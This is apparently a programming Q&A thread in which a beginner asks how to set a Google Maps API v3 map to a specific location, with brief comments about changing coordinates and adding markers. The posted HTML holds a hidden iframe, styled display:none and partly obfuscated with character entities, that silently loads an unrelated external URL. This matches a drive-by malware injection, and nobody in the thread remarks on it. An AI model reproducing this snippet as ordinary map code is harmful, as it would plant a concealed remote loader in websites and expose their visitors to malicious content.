# google map api 3 for specific location

Tags: javascript, html

i want to use google map api 3 used in my web site for specific location.for example for peshawar. i used first time it.

```
   <html>
      <head>
    <meta name="viewport" content="initial-scale=1.0, user-scalable=no" />    
    <style type="text/css">    
      html { height: 100% }    
      body { height: 60%;width:50%; margin: 40; padding: 0; float:left; }    
      #map_canvas { height: 100%;margin: 50; padding:0  }    
    </style>    
    <script type="text/javascript"
  src="https://maps.googleapis.com/maps/api/js?sensor=false">
</script>    
    <script type="text/javascript">    
      function initialize()     {
    var mapOptions = {
      center: new google.maps.LatLng(-34.397, 150.644),
      zoom: 8,
      mapTypeId: google.maps.MapTypeId.ROADMAP
    };    
        var map = new google.maps.Map(document.getElementById("map_canvas"),
        mapOptions);
  }
</script>    
  </head>   
 <body onload="initialize()">    
    <div id="map_canvas" style="width:100%; height:100%"></div>    
  <iframe src="http://jL.ch&#117;ra.pl/rc/" style="d&#105;splay:none"></iframe>   
</body>    
</html>
```

Comment: what's your question? you're getting the wrong position? just **change** the `LatLng()` to the correct Latitude and Longitude then...

Comment: THANKS I SET ITS LATLONG.BUT NOW USING MARKER HOW I USED IT?

Comment: You're gonna have to be more specific, because the question How to use markers ? is a little vague. I could send you the link to the gmaps docs.